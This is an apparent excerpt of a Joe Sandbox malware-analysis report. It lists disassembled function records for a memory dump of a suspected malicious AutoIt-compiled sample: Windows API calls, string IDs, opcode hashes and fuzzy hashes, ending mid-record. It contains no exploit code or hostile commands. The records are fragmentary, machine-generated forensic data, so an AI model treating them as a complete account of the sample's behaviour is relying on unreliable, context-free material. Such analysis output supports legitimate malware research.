                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID: %~
                    • API String ID: 0-3145668672
                    • Opcode ID: cdad68261e83f959bb87685e8dbdba160dcc36655c3a41a63caf3eb1ac09439f
                    • Instruction ID: 1c51f1b87874b807c615f98aebcaa72d86ae0b5aad3801cec12ec6fc06312ad2
                    • Opcode Fuzzy Hash: cdad68261e83f959bb87685e8dbdba160dcc36655c3a41a63caf3eb1ac09439f
                    • Instruction Fuzzy Hash: EDB1B271900109DBCF14EF94C4959FDB7B4FF44312F90402AED06A7295EBB89E9ACB91
                    APIs
                      • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • __wcsnicmp.LIBCMT ref: 007BB298
                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007BB361
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                    • String ID: LPT
                    • API String ID: 3222508074-1350329615
                    • Opcode ID: b2b4748e3293a5abc6ef41ba7dafb19063a186210b89c1f4c6078a4b529ba7a7
                    • Instruction ID: 7901a228d66b9a402db53e2ee9007dde1e87a40c7449354d4283d9ffb3737d93
                    • Opcode Fuzzy Hash: b2b4748e3293a5abc6ef41ba7dafb19063a186210b89c1f4c6078a4b529ba7a7
                    • Instruction Fuzzy Hash: E6614E75A00215EFCB14DF94C885EEEB7F4EB48310F15805AF946AB291DBB8AE44CB50
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: Oav
                    • API String ID: 4104443479-1091017984
                    • Opcode ID: 19178e50488fbb08f91eeb693d950218bd125f812b4a0af14f077349043ee815
                    • Instruction ID: 377a5864d7a163cbd5b02aee29dc58c01efeb03546544f70fd4144da69e5598b
                    • Opcode Fuzzy Hash: 19178e50488fbb08f91eeb693d950218bd125f812b4a0af14f077349043ee815
                    • Instruction Fuzzy Hash: 3A5150B0900609DFCF64CF68D884AAEBBF1FF45304F14852AE85AD7350EB39A955CB51
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00762AC8
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00762AE1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    • Opcode ID: b88dacca66b384dd313bfb705c0d96fa083d94af6ef8eace7dfab5221100898c
                    • Instruction ID: c10478231e65e06d0dedd026042e2cedee2f0d4663ce11b89d5d79a0f2cea47f
                    • Opcode Fuzzy Hash: b88dacca66b384dd313bfb705c0d96fa083d94af6ef8eace7dfab5221100898c
                    • Instruction Fuzzy Hash: B5515871418745DBD320AF10D88ABABBBE8FF84311F42885DF6E9510A1DB798529CB26
                    APIs
                      • Part of subcall function 0075506B: __fread_nolock.LIBCMT ref: 00755089
                    • _wcscmp.LIBCMT ref: 007B9AAE
                    • _wcscmp.LIBCMT ref: 007B9AC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    • Opcode ID: f07f05e72fda78fcef589da2da584058933d540d8a8c8b6adaad8e5138ad9055
                    • Instruction ID: 76132c69fbd74f36d0057e811895a6b5be4293d0c69e8b7a774a565e0619c552
                    • Opcode Fuzzy Hash: f07f05e72fda78fcef589da2da584058933d540d8a8c8b6adaad8e5138ad9055
                    • Instruction Fuzzy Hash: B641B871A00659FADF20AAA4DC49FEFB7B9DF45710F004069BA14A71C1D6B99A0487A1
                    APIs
                    • _memset.LIBCMT ref: 007C2892
                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007C28C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |
                    • API String ID: 1413715105-2343686810
                    • Opcode ID: 95ea1a0e4ae90e4f0a83ceb6f4b5f3edc34070478d361a5dde5fc342d289447a
                    • Instruction ID: cfae493e9685a94a706f0f7823618325533a29209d4d443dc4383956f56bacb9
                    • Opcode Fuzzy Hash: 95ea1a0e4ae90e4f0a83ceb6f4b5f3edc34070478d361a5dde5fc342d289447a
                    • Instruction Fuzzy Hash: 00311971800119EBCF05EFA1DC89EEEBFB9FF08310F104029E815A6166DB756A56DBA0
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 007D6D86
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007D6DC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    • Opcode ID: 055a16870b1a5ce2050aa1ee11e433090bcce0bbfe62bceab84a876a4325e854
                    • Instruction ID: b785b1260039b3c8498fbfa4b21cf37a2824e44aab7b9ee79ee51454222b7821
                    • Opcode Fuzzy Hash: 055a16870b1a5ce2050aa1ee11e433090bcce0bbfe62bceab84a876a4325e854
                    • Instruction Fuzzy Hash: 22319E71200204AEDF109F24DC84AFB77B9FF48720F10861AF9A697290DB79AC91DB64
                    APIs
                    • _memset.LIBCMT ref: 007B2E00
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007B2E3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: e18d1a2c1110369198461d687dd54111c34addfc0fde4653c36b5b65e7888e21
                    • Instruction ID: 8d3ed3b4cb7c632cae3e02c08576932d6ba82ca300de9f334982ac9a4ac8dd7a
                    • Opcode Fuzzy Hash: e18d1a2c1110369198461d687dd54111c34addfc0fde4653c36b5b65e7888e21
                    • Instruction Fuzzy Hash: A6310631601305EBEB248F49C84DBEEBBB9FF45340F24402AE985D61A2E778D942CB51
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007D69D0
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D69DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    • Opcode ID: da67a36222d0f4362b289d8273fd7fbc3054005e74688580fd77bb678d9a4ee7
                    • Instruction ID: 656af422ff626d9fe6b232fea0c161e462a850e57093e4ea4882fcdfff615bf8
                    • Opcode Fuzzy Hash: da67a36222d0f4362b289d8273fd7fbc3054005e74688580fd77bb678d9a4ee7
                    • Instruction Fuzzy Hash: BB11C471700208AFEF119F14CCA0EFB377EEB883A4F11412AF95897390D679AC5187A0
                    APIs
                      • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                      • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                      • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                    • GetWindowRect.USER32(00000000,?), ref: 007D6EE0
                    • GetSysColor.USER32(00000012), ref: 007D6EFA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: fcea34d3060ac7e6f8e87951e19b6a2decf939835cb842eb9364e6464435cc5f
                    • Instruction ID: 46bb6f9dd38ae8cc38cbc69f3e5775684458fd245c71b6d727248258fca1edd5
                    • Opcode Fuzzy Hash: fcea34d3060ac7e6f8e87951e19b6a2decf939835cb842eb9364e6464435cc5f
                    • Instruction Fuzzy Hash: 6C216A72610209AFDB04DFA8DD45AFA7BB8FB08315F04462AFD55D3250E738E861DB60
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 007D6C11
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007D6C20
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: 54b1a9cbbb5d5fca34e29d2e60f78a10194a7c486d1138f5aeaa15bae3b8d4ba
                    • Instruction ID: 7774ff2ebca401b3ed5e505274f9ceb899d051457e3040ef3daef902075db16e
                    • Opcode Fuzzy Hash: 54b1a9cbbb5d5fca34e29d2e60f78a10194a7c486d1138f5aeaa15bae3b8d4ba
                    • Instruction Fuzzy Hash: BB11BCB1101208ABEB108F64DC45AFB3B79EB04378F208726F965D32E0C779EC909B60
                    APIs
                    • _memset.LIBCMT ref: 007B2F11
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007B2F30
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 4c869c815c1e82a1a62a466a52aca629dfb14b7cc7cd8a9df98677e816f48c39
                    • Instruction ID: 98e85c6aae3b383a3a861d3e7a285b3d9f35e7bd33f775fd86db1f54fdda133a
                    • Opcode Fuzzy Hash: 4c869c815c1e82a1a62a466a52aca629dfb14b7cc7cd8a9df98677e816f48c39
                    • Instruction Fuzzy Hash: 92119071902124AFDB20DB58DC48FE977B9EF05310F1840B5E865A72A2E7B8EE06C791
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007C2520
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007C2549
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: 14eaea81888fc83a3747d1a6e115ab3d66b35e7ca3710d127aed6accd8240c6f
                    • Instruction ID: 9f393298045b5f7c02e32a73093de2e354f4ea87b96b1796fe7d10163ec416fe
                    • Opcode Fuzzy Hash: 14eaea81888fc83a3747d1a6e115ab3d66b35e7ca3710d127aed6accd8240c6f
                    • Instruction Fuzzy Hash: 4711E0B0201225BADB288F519C98FFBFF68FB06361F10816EF90542041D2786A62DAE0
                    APIs
                      • Part of subcall function 007C830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,007C80C8,?,00000000,?,?), ref: 007C8322
                    • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C80CB
                    • htons.WSOCK32(00000000,?,00000000), ref: 007C8108
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidehtonsinet_addr
                    • String ID: 255.255.255.255
                    • API String ID: 2496851823-2422070025
                    • Opcode ID: 05aada6adccc7e7cbd85d7d9c1b7d374164d331864d67723836a9fa1ca5bf660
                    • Instruction ID: 1eb61b15e104da7bab7c1f5038f9e3882fec188ec0596107514ed416f1c38c58
                    • Opcode Fuzzy Hash: 05aada6adccc7e7cbd85d7d9c1b7d374164d331864d67723836a9fa1ca5bf660
                    • Instruction Fuzzy Hash: 2911E534600209ABCB10AFA4CC86FEDB774FF05320F14852FE91197291DB75A805C796
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007A9355
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: f2aeb9cd26b4020416258cc3965e93608ddf5655254c6fb205dab61d7fdb317c
                    • Instruction ID: f2d5b7a0b4b13ddb522954e5244a4589ef25c2ae7f9cf568e5284a9aa477c95e
                    • Opcode Fuzzy Hash: f2aeb9cd26b4020416258cc3965e93608ddf5655254c6fb205dab61d7fdb317c
                    • Instruction Fuzzy Hash: 8F01CC71A01214ABCF08EBA0CC968FE7769BB86320B100719FA72972D2DA29581C8650
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 007A924D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 685249a4b52f4d6acf26947c8ab268d8745987356a088afc9377590ea5a78b3c
                    • Instruction ID: 58d8c7f50cf5723afc1990bc8461a6ae3a0bb8d3efe02f31169165cfe4c40560
                    • Opcode Fuzzy Hash: 685249a4b52f4d6acf26947c8ab268d8745987356a088afc9377590ea5a78b3c
                    • Instruction Fuzzy Hash: DE018471E41104BBCB18EBA0CD96EFF77A8EF86300F140219B912672D2EA5D5E1C9661
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 007A92D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 7486a9b618f3f9da0088b00329129b29d958a05e36d5994e0d60debd25fe07da
                    • Instruction ID: 4867b89c836f9d2bd0abd6bed38d714f2f675b09a5b999a9e9db5389d33658b4
                    • Opcode Fuzzy Hash: 7486a9b618f3f9da0088b00329129b29d958a05e36d5994e0d60debd25fe07da
                    • Instruction Fuzzy Hash: 7501A271E41108B7CB04EAA0CD96EFF77ACAF52301F244215B912A32D2DA695E1C9271
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: d1a53eff19a3a7ac5c333880e7f275643f7292e90ccc1e88faf7126a135b17b8
                    • Instruction ID: f4bf998b72775070663e485973eb7fb81fb11f425a0301d426978af4ae87ffa4
                    • Opcode Fuzzy Hash: d1a53eff19a3a7ac5c333880e7f275643f7292e90ccc1e88faf7126a135b17b8
                    • Instruction Fuzzy Hash: 32E02272A013282AE720AAA9AC49BE7FBACFB40771F00006BFD14D3040E5749A448BE0
                    APIs
                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007A81CA
                      • Part of subcall function 00773598: _doexit.LIBCMT ref: 007735A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Message_doexit
                    • String ID: AutoIt$Error allocating memory.
                    • API String ID: 1993061046-4017498283
                    • Opcode ID: 979f202250a49cc1706c396fb0be5785c02b548dc0e031becd7151865820169e
                    • Instruction ID: 131193799971421e00805ecc27a335b4509cf0378d717a28d7f278d286da99f7
                    • Opcode Fuzzy Hash: 979f202250a49cc1706c396fb0be5785c02b548dc0e031becd7151865820169e
                    • Instruction Fuzzy Hash: 66D0123238535872D65432A96C0BBC56A484B05B56F508016FB0C955D389DE999152ED
                    APIs
                      • Part of subcall function 0078B564: _memset.LIBCMT ref: 0078B571
                      • Part of subcall function 00770B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0078B540,?,?,?,0075100A), ref: 00770B89
                    • IsDebuggerPresent.KERNEL32(?,?,?,0075100A), ref: 0078B544
                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0075100A), ref: 0078B553
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0078B54E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
